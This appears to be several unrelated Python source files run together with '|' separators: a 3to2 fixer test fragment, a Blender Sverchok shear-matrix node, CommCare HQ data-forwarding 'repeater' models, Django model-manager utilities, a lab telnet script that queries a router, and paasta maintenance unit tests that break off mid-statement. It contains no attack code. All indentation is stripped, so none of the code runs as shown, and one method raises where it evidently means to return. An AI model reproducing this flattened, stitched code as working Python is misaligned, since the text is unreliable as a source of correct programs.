other_stuff = make_more_stuff(a, b, c)"""
a = u"""
while True:
_3to2list = list(stuff)
a, b, c, = _3to2list[:1] + [_3to2list[1:-1]] + _3to2list[-1:]
other_stuff = make_more_stuff(a, b, c)"""
self.check(b, a)
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import EnumProperty, FloatProperty
from mathutils import Matrix
from sverchok.node_tree import SverchCustomTreeNode, StringsSocket
from sverchok.data_structure import (updateNode, fullList, Matrix_listing,
SvSetSocketAnyType, SvGetSocketAnyType)
class MatrixShearNode(bpy.types.Node, SverchCustomTreeNode):
''' Construct a Shear Matirx '''
bl_idname = 'MatrixShearNode'
bl_label = 'Shear Matrix'
bl_icon = 'OUTLINER_OB_EMPTY'
# select Shear plane
mode_items = [
("XY", "XY-plane", ""),
("XZ", "XZ-plane", ""),
("YZ", "YZ-plane", ""),
]
factor1_ = FloatProperty(name='Factor 1', description='Factor1',
default=0.0,
options={'ANIMATABLE'}, update=updateNode)
factor2_ = FloatProperty(name='Factor 2', description='Factor2',
default=0.0,
options={'ANIMATABLE'}, update=updateNode)
plane_ = EnumProperty(name="Plane", description="Function choice",
default="XY", items=mode_items,
update=updateNode)
def sv_init(self, context):
self.inputs.new('StringsSocket', "Factor1").prop_name = 'factor1_'
self.inputs.new('StringsSocket', "Factor2").prop_name = 'factor2_'
self.outputs.new('MatrixSocket', "Matrix", "Matrix")
def draw_buttons(self, context, layout):
layout.prop(self, "plane_", "Shear plane:", expand=True)
def process(self):
if not self.outputs['Matrix'].is_linked:
return
# inputs
factor1 = self.inputs['Factor1'].sv_get()
factor2 = self.inputs['Factor2'].sv_get()
# outputs
max_l = max(len(factor1), len(factor2))
fullList(factor1, max_l)
fullList(factor2, max_l)
matrixes_ = []
for i in range(max_l):
max_inner = max(len(factor1[i]), len(factor2[i]))
fullList(factor1[i], max_inner)
fullList(factor2[i], max_inner)
for j in range(max_inner):
matrixes_.append(Matrix.Shear(self.plane_, 4, (factor1[i][j], factor2[i][j])))
matrixes = Matrix_listing(matrixes_)
self.outputs['Matrix'].sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixShearNode)
def unregister():
bpy.utils.unregister_class(MatrixShearNode)
|
import base64
from collections import namedtuple
from datetime import datetime, timedelta
import logging
import urllib
import urlparse
from django.utils.translation import ugettext_lazy as _
from requests.exceptions import Timeout, ConnectionError
from corehq.apps.cachehq.mixins import QuickCachedDocumentMixin
from corehq.form_processor.exceptions import XFormNotFound
from corehq.util.datadog.metrics import REPEATER_ERROR_COUNT
from corehq.util.datadog.utils import log_counter
from corehq.util.quickcache import quickcache
from dimagi.ext.couchdbkit import *
from couchdbkit.exceptions import ResourceNotFound
from django.core.cache import cache
import hashlib
from casexml.apps.case.xml import V2, LEGAL_VERSIONS
from corehq.apps.receiverwrapper.exceptions import DuplicateFormatException, IgnoreDocument
from corehq.form_processor.interfaces.dbaccessors import FormAccessors, CaseAccessors
from couchforms.const import DEVICE_LOG_XMLNS
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.parsing import json_format_datetime
from dimagi.utils.mixins import UnicodeMixIn
from dimagi.utils.post import simple_post
from .dbaccessors import (
get_pending_repeat_record_count,
get_failure_repeat_record_count,
get_success_repeat_record_count,
)
from .const import (
MAX_RETRY_WAIT,
MIN_RETRY_WAIT,
RECORD_FAILURE_STATE,
RECORD_SUCCESS_STATE,
RECORD_PENDING_STATE,
POST_TIMEOUT,
)
from .exceptions import RequestConnectionError
from .utils import get_all_repeater_types
def simple_post_with_cached_timeout(data, url, expiry=60 * 60, force_send=False, *args, **kwargs):
# no control characters (e.g. '/') in keys
key = hashlib.md5(
'{0} timeout {1}'.format(__name__, url)
).hexdigest()
cache_value = cache.get(key)
if cache_value and not force_send:
raise RequestConnectionError(cache_value)
try:
resp = simple_post(data, url, *args, **kwargs)
except (Timeout, ConnectionError), e:
cache.set(key, e.message, expiry)
raise RequestConnectionError(e.message)
if not 200 <= resp.status_code < 300:
message = u'Status Code {}: {}'.format(resp.status_code, resp.reason)
cache.set(key, message, expiry)
raise RequestConnectionError(message)
return resp
DELETED = "-Deleted"
FormatInfo = namedtuple('FormatInfo', 'name label generator_class')
PostInfo = namedtuple('PostInfo', 'payload headers force_send max_tries')
class GeneratorCollection(object):
"""Collection of format_name to Payload Generators for a Repeater class
args:
repeater_class: A valid child class of Repeater class
"""
def __init__(self, repeater_class):
self.repeater_class = repeater_class
self.default_format = ''
self.format_generator_map = {}
def add_new_format(self, format_name, format_label, generator_class, is_default=False):
"""Adds a new format->generator mapping to the collection
args:
format_name: unique name to identify the format
format_label: label to be displayed to the user
generator_class: child class of .repeater_generators.BasePayloadGenerator
kwargs:
is_default: True if the format_name should be default format
exceptions:
raises DuplicateFormatException if format is added with is_default while other
default exists
raises DuplicateFormatException if format_name alread exists in the collection
"""
if is_default and self.default_format:
raise DuplicateFormatException("A default format already exists for this repeater.")
elif is_default:
self.default_format = format_name
if format_name in self.format_generator_map:
raise DuplicateFormatException("There is already a Generator with this format name.")
self.format_generator_map[format_name] = FormatInfo(
name=format_name,
label=format_label,
generator_class=generator_class
)
def get_default_format(self):
"""returns default format"""
return self.default_format
def get_default_generator(self):
"""returns generator class for the default format"""
raise self.format_generator_map[self.default_format].generator_class
def get_all_formats(self, for_domain=None):
"""returns all the formats added to this repeater collection"""
return [(name, format.label) for name, format in self.format_generator_map.iteritems()
if not for_domain or format.generator_class.enabled_for_domain(for_domain)]
def get_generator_by_format(self, format):
"""returns generator class given a format"""
return self.format_generator_map[format].generator_class
class Repeater(QuickCachedDocumentMixin, Document, UnicodeMixIn):
"""
Represents the configuration of a repeater. Will specify the URL to forward to and
other properties of the configuration.
"""
base_doc = 'Repeater'
domain = StringProperty()
url = StringProperty()
format = StringProperty()
use_basic_auth = BooleanProperty(default=False)
username = StringProperty()
password = StringProperty()
friendly_name = _("Data")
@classmethod
def get_custom_url(cls, domain):
return None
@classmethod
def available_for_domain(cls, domain):
"""Returns whether this repeater can be used by a particular domain
"""
return True
def get_pending_record_count(self):
return get_pending_repeat_record_count(self.domain, self._id)
def get_failure_record_count(self):
return get_failure_repeat_record_count(self.domain, self._id)
def get_success_record_count(self):
return get_success_repeat_record_count(self.domain, self._id)
def format_or_default_format(self):
from corehq.apps.repeaters.repeater_generators import RegisterGenerator
return self.format or RegisterGenerator.default_format_by_repeater(self.__class__)
def get_payload_generator(self, payload_format):
from corehq.apps.repeaters.repeater_generators import RegisterGenerator
gen = RegisterGenerator.generator_class_by_repeater_format(self.__class__, payload_format)
return gen(self)
def payload_doc(self, repeat_record):
raise NotImplementedError
def get_payload(self, repeat_record):
generator = self.get_payload_generator(self.format_or_default_format())
return generator.get_payload(repeat_record, self.payload_doc(repeat_record))
def register(self, payload, next_check=None):
if not self.allowed_to_forward(payload):
return
repeat_record = RepeatRecord(
repeater_id=self.get_id,
repeater_type=self.doc_type,
domain=self.domain,
next_check=next_check or datetime.utcnow(),
payload_id=payload.get_id
)
repeat_record.save()
return repeat_record
def allowed_to_forward(self, payload):
"""
Return True/False depending on whether the payload meets forawrding criteria or not
"""
return True
def clear_caches(self):
if self.__class__ == Repeater:
cls = self.get_class_from_doc_type(self.doc_type)
else:
cls = self.__class__
# clear cls.by_domain (i.e. filtered by doc type)
Repeater.by_domain.clear(cls, self.domain)
# clear Repeater.by_domain (i.e. not filtered by doc type)
Repeater.by_domain.clear(Repeater, self.domain)
@classmethod
@quickcache(['cls.__name__', 'domain'], timeout=5 * 60, memoize_timeout=10)
def by_domain(cls, domain):
key = [domain]
if cls.__name__ in get_all_repeater_types():
key.append(cls.__name__)
elif cls.__name__ == Repeater.__name__:
# In this case the wrap function delegates to the
# appropriate sub-repeater types.
pass
else:
# Any repeater type can be posted to the API, and the installed apps
# determine whether we actually know about it.
# But if we do not know about it, then may as well return nothing now
return []
raw_docs = cls.view('receiverwrapper/repeaters',
startkey=key,
endkey=key + [{}],
include_docs=True,
reduce=False,
wrap_doc=False
)
return [cls.wrap(repeater_doc['doc']) for repeater_doc in raw_docs
if cls.get_class_from_doc_type(repeater_doc['doc']['doc_type'])]
@classmethod
def wrap(cls, data):
if cls.__name__ == Repeater.__name__:
cls_ = cls.get_class_from_doc_type(data['doc_type'])
if cls_:
return cls_.wrap(data)
else:
raise ResourceNotFound('Unknown repeater type: %s' % data)
else:
return super(Repeater, cls).wrap(data)
@staticmethod
def get_class_from_doc_type(doc_type):
doc_type = doc_type.replace(DELETED, '')
repeater_types = get_all_repeater_types()
if doc_type in repeater_types:
return repeater_types[doc_type]
else:
return None
def retire(self):
if DELETED not in self['doc_type']:
self['doc_type'] += DELETED
if DELETED not in self['base_doc']:
self['base_doc'] += DELETED
self.save()
def get_url(self, repeate_record):
# to be overridden
return self.url
def allow_retries(self, response):
"""Whether to requeue the repeater when it fails
"""
return True
def allow_immediate_retries(self, response):
"""Whether to retry failed requests immediately a few times
"""
return True
def get_headers(self, repeat_record):
# to be overridden
generator = self.get_payload_generator(self.format_or_default_format())
headers = generator.get_headers()
if self.use_basic_auth:
user_pass = base64.encodestring(':'.join((self.username, self.password))).replace('\n', '')
headers.update({'Authorization': 'Basic ' + user_pass})
return headers
def handle_success(self, response, repeat_record):
"""handle a successful post
"""
generator = self.get_payload_generator(self.format_or_default_format())
return generator.handle_success(response, self.payload_doc(repeat_record))
def handle_failure(self, response, repeat_record):
"""handle a failed post
"""
generator = self.get_payload_generator(self.format_or_default_format())
return generator.handle_failure(response, self.payload_doc(repeat_record))
class FormRepeater(Repeater):
"""
Record that forms should be repeated to a new url
"""
include_app_id_param = BooleanProperty(default=True)
white_listed_form_xmlns = StringListProperty(default=[]) # empty value means all form xmlns are accepted
friendly_name = _("Forward Forms")
@memoized
def payload_doc(self, repeat_record):
return FormAccessors(repeat_record.domain).get_form(repeat_record.payload_id)
def allowed_to_forward(self, payload):
return (
payload.xmlns != DEVICE_LOG_XMLNS and
(not self.white_listed_form_xmlns or payload.xmlns in self.white_listed_form_xmlns)
)
def get_url(self, repeat_record):
url = super(FormRepeater, self).get_url(repeat_record)
if not self.include_app_id_param:
return url
else:
# adapted from http://stackoverflow.com/a/2506477/10840
url_parts = list(urlparse.urlparse(url))
query = urlparse.parse_qsl(url_parts[4])
query.append(("app_id", self.payload_doc(repeat_record).app_id))
url_parts[4] = urllib.urlencode(query)
return urlparse.urlunparse(url_parts)
def get_headers(self, repeat_record):
headers = super(FormRepeater, self).get_headers(repeat_record)
headers.update({
"received-on": self.payload_doc(repeat_record).received_on.isoformat()+"Z"
})
return headers
def __unicode__(self):
return "forwarding forms to: %s" % self.url
class CaseRepeater(Repeater):
"""
Record that cases should be repeated to a new url
"""
version = StringProperty(default=V2, choices=LEGAL_VERSIONS)
white_listed_case_types = StringListProperty(default=[]) # empty value means all case-types are accepted
black_listed_users = StringListProperty(default=[]) # users who caseblock submissions should be ignored
friendly_name = _("Forward Cases")
def allowed_to_forward(self, payload):
return self._allowed_case_type(payload) and self._allowed_user(payload)
def _allowed_case_type(self, payload):
return not self.white_listed_case_types or payload.type in self.white_listed_case_types
def _allowed_user(self, payload):
return self.payload_user_id(payload) not in self.black_listed_users
def payload_user_id(self, payload):
# get the user_id who submitted the payload, note, it's not the owner_id
return payload.actions[-1].user_id
@memoized
def payload_doc(self, repeat_record):
return CaseAccessors(repeat_record.domain).get_case(repeat_record.payload_id)
def get_headers(self, repeat_record):
headers = super(CaseRepeater, self).get_headers(repeat_record)
headers.update({
"server-modified-on": self.payload_doc(repeat_record).server_modified_on.isoformat()+"Z"
})
return headers
def __unicode__(self):
return "forwarding cases to: %s" % self.url
class ShortFormRepeater(Repeater):
"""
Record that form id & case ids should be repeated to a new url
"""
version = StringProperty(default=V2, choices=LEGAL_VERSIONS)
friendly_name = _("Forward Form Stubs")
@memoized
def payload_doc(self, repeat_record):
return FormAccessors(repeat_record.domain).get_form(repeat_record.payload_id)
def allowed_to_forward(self, payload):
return payload.xmlns != DEVICE_LOG_XMLNS
def get_headers(self, repeat_record):
headers = super(ShortFormRepeater, self).get_headers(repeat_record)
headers.update({
"received-on": self.payload_doc(repeat_record).received_on.isoformat()+"Z"
})
return headers
def __unicode__(self):
return "forwarding short form to: %s" % self.url
class AppStructureRepeater(Repeater):
friendly_name = _("Forward App Schema Changes")
def payload_doc(self, repeat_record):
return None
class RepeatRecord(Document):
"""
An record of a particular instance of something that needs to be forwarded
with a link to the proper repeater object
"""
repeater_id = StringProperty()
repeater_type = StringProperty()
domain = StringProperty()
last_checked = DateTimeProperty()
next_check = DateTimeProperty()
succeeded = BooleanProperty(default=False)
failure_reason = StringProperty()
payload_id = StringProperty()
@property
@memoized
def repeater(self):
return Repeater.get(self.repeater_id)
@property
def url(self):
try:
return self.repeater.get_url(self)
except (XFormNotFound, ResourceNotFound):
return None
@property
def state(self):
state = RECORD_PENDING_STATE
if self.succeeded:
state = RECORD_SUCCESS_STATE
elif self.failure_reason:
state = RECORD_FAILURE_STATE
return state
@classmethod
def all(cls, domain=None, due_before=None, limit=None):
json_now = json_format_datetime(due_before or datetime.utcnow())
repeat_records = RepeatRecord.view("receiverwrapper/repeat_records_by_next_check",
startkey=[domain],
endkey=[domain, json_now, {}],
include_docs=True,
reduce=False,
limit=limit,
)
return repeat_records
@classmethod
def count(cls, domain=None):
results = RepeatRecord.view("receiverwrapper/repeat_records_by_next_check",
startkey=[domain],
endkey=[domain, {}],
reduce=True,
).one()
return results['value'] if results else 0
def set_next_try(self, reason=None):
# we use an exponential back-off to avoid submitting to bad urls
# too frequently.
assert self.succeeded is False
assert self.next_check is not None
now = datetime.utcnow()
window = timedelta(minutes=0)
if self.last_checked:
window = self.next_check - self.last_checked
window += (window // 2) # window *= 1.5
if window < MIN_RETRY_WAIT:
window = MIN_RETRY_WAIT
elif window > MAX_RETRY_WAIT:
window = MAX_RETRY_WAIT
self.last_checked = now
self.next_check = self.last_checked + window
def try_now(self):
# try when we haven't succeeded and either we've
# never checked, or it's time to check again
return not self.succeeded
def get_payload(self):
try:
return self.repeater.get_payload(self)
except ResourceNotFound as e:
# this repeater is pointing at a missing document
# quarantine it and tell it to stop trying.
logging.exception(
u'Repeater {} in domain {} references a missing or deleted document!'.format(
self._id, self.domain,
))
self._payload_exception(e, reraise=False)
except IgnoreDocument:
# this repeater is pointing at a document with no payload
logging.info(u'Repeater {} in domain {} references a document with no payload'.format(
self._id, self.domain,
))
# Mark it succeeded so that we don't try again
self.update_success()
except Exception as e:
self._payload_exception(e, reraise=True)
def _payload_exception(self, exception, reraise=False):
self.doc_type = self.doc_type + '-Failed'
self.failure_reason = unicode(exception)
self.save()
if reraise:
raise exception
def fire(self, max_tries=3, force_send=False):
headers = self.repeater.get_headers(self)
if self.try_now() or force_send:
tries = 0
post_info = PostInfo(self.get_payload(), headers, force_send, max_tries)
self.post(post_info, tries=tries)
def post(self, post_info, tries=0):
tries += 1
try:
response = simple_post_with_cached_timeout(
post_info.payload,
self.url,
headers=post_info.headers,
force_send=post_info.force_send,
timeout=POST_TIMEOUT,
)
except Exception, e:
self.handle_exception(e)
else:
return self.handle_response(response, post_info, tries)
def handle_response(self, response, post_info, tries):
if 200 <= response.status_code < 300:
return self.handle_success(response)
else:
return self.handle_failure(response, post_info, tries)
def handle_success(self, response):
"""Do something with the response if the repeater succeeds
"""
self.last_checked = datetime.utcnow()
self.next_check = None
self.succeeded = True
self.repeater.handle_success(response, self)
def handle_failure(self, response, post_info, tries):
"""Do something with the response if the repeater fails
"""
if tries < post_info.max_tries and self.repeater.allow_immediate_retries(response):
return self.post(post_info, tries)
else:
self._fail(u'{}: {}'.format(response.status_code, response.reason), response)
self.repeater.handle_failure(response, self)
def handle_exception(self, exception):
"""handle internal exceptions
"""
self._fail(unicode(exception), None)
def _fail(self, reason, response):
if self.repeater.allow_retries(response):
self.set_next_try()
self.failure_reason = reason
log_counter(REPEATER_ERROR_COUNT, {
'_id': self._id,
'reason': reason,
'target_url': self.url,
})
# import signals
# Do not remove this import, its required for the signals code to run even though not explicitly used in this file
from corehq.apps.repeaters import signals
|
from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
"""
FIX see https://bitbucket.org/carljm/django-model-utils/pull-request/5/patch-to-issue-16/diff
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
"""
def get_attribute(obj, s):
try:
return getattr(obj,s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
"""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
"""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, "_db"):
kwargs["using"] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
"""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
"""
warnings.warn(
"manager_from is pending deprecation; use PassThroughManager instead.",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
|
#!/usr/bin/env python
'''
Class-based version....
Write a script that connects to the lab pynet-rtr1, logins, and executes the
'show ip int brief' command.
'''
import telnetlib
import time
import socket
import sys
import getpass
TELNET_PORT = 23
TELNET_TIMEOUT = 6
class TelnetConn(object):
'''
Telnet connection for cisco style network devices
'''
def __init__(self, ip_addr, username, password):
self.ip_addr = ip_addr
self.username = username
self.password = password
try:
self.remote_conn = telnetlib.Telnet(self.ip_addr, TELNET_PORT, TELNET_TIMEOUT)
except socket.timeout:
sys.exit('Connection timed-out')
def send_command(self, cmd):
'''
Send a command down the telnet channel
Return the response
'''
cmd = cmd.rstrip()
self.remote_conn.write(cmd + '\n')
time.sleep(1)
return self.remote_conn.read_very_eager()
def login(self):
'''
Login to network device
'''
output = self.remote_conn.read_until("sername:", TELNET_TIMEOUT)
self.remote_conn.write(self.username + '\n')
output += self.remote_conn.read_until("ssword:", TELNET_TIMEOUT)
self.remote_conn.write(self.password + '\n')
return output
def disable_paging(self, paging_cmd='terminal length 0'):
'''
Disable the paging of output (i.e. --More--)
'''
return self.send_command(paging_cmd)
def close(self):
'''
Close telnet connection
'''
return self.remote_conn.close()
def main():
'''
Write a script that connects to the lab pynet-rtr1, logins, and executes the
'show ip int brief' command.
'''
ip_addr = raw_input("IP address: ")
ip_addr = ip_addr.strip()
username = 'pyclass'
password = getpass.getpass()
telnet_conn = TelnetConn(ip_addr, username, password)
telnet_conn.login()
telnet_conn.disable_paging()
output = telnet_conn.send_command('show ip int brief')
print "\n\n"
print output
print "\n\n"
telnet_conn.close()
if __name__ == "__main__":
main()
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from paasta_tools import paasta_maintenance
@mock.patch("paasta_tools.mesos_maintenance.is_host_drained", autospec=True)
@mock.patch(
"paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start", autospec=True
)
def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = []
assert not paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = []
assert paasta_maintenance.is_safe_to_kill("blah")
@mock.patch("paasta_tools.paasta_maintenance.is_hostname_local", autospec=True)
def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):
mock_is_hostname_local.return_value = False
assert paasta_maintenance.is_safe_to_drain("non-localhost") is False
@mock.patch("paasta_tools.paasta_maintenance.getfqdn", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.gethostname", autospec=True)
def test_is_hostname_local_works(mock_gethostname, mock_getfqdn):
mock_gethostname.return_value = "foo"
mock_getfqdn.return_value = "foo.bar"
assert paasta_maintenance.is_hostname_local("localhost") is True
assert paasta_maintenance.is_hostname_local("foo") is True
assert paasta_maintenance.is_hostname_local("foo.bar") is True
assert paasta_maintenance.is_hostname_local("something_different") is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
def test_are_local_tasks_in_danger_fails_safe_with_false(
mock_load_system_paasta_config,
):
"""If something unexpected happens that we don't know how to
interpret, we make sure that we fail with "False" so that processes
move on and don't deadlock. In general the answer to "is it safe to drain"
is "yes" if mesos can't be reached, etc"""
mock_load_system_paasta_config.side_effect = Exception
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
def test_are_local_tasks_in_danger_is_false_with_nothing_running(
mock_marathon_services_running_here, mock_load_system_paasta_config
):
mock_marathon_services_running_here.return_value = []
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = False
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is False
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.synapse_replication_is_low", autospec=True)
def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(
mock_synapse_replication_is_low,
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = True
mock_synapse_replication_is_low.return_value = True
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is True
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
assert mock_synapse_replication_is_low.call_count == 1
@mock.patch(
"paasta_tools.paasta_maintenance.load_marathon_service_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.load_smartstack_info_for_service", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace",
autospec=True,
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_replication_for_services", autospec=True
)
def test_synapse_replication_is_low_understands_underreplicated_services(
mock_get_replication_for_services,
mock_get_expected_instance_count_for_namespace,
mock_load_smartstack_info_for_service,
mock_load_marathon_service_config,
):
mock_load_marathon_service_config.return_value.get_registrations.return_value = (
"service.main"
)
mock_get_expected_instance_count_for_namespace.return_value = 3
mock_load_smartstack_info_for_service.return_value = {
"local_region": {"service.main": "up"}
}
mock_get_replication_for_services.return_value = {"service.main": 1}
local_backends = ["foo"]
system_paasta_config = mock.MagicMock()
assert (
paasta_maintenance.synapse_replication_is_low(
service="service",
instance="instance",
system_paasta_config=system_paasta_config,
local_backends=local_backends,
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "192.0.2.1"
local_port = 42
backends = [
{"status": "UP", "pxname": "service.main", "svname": "192.0.2.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
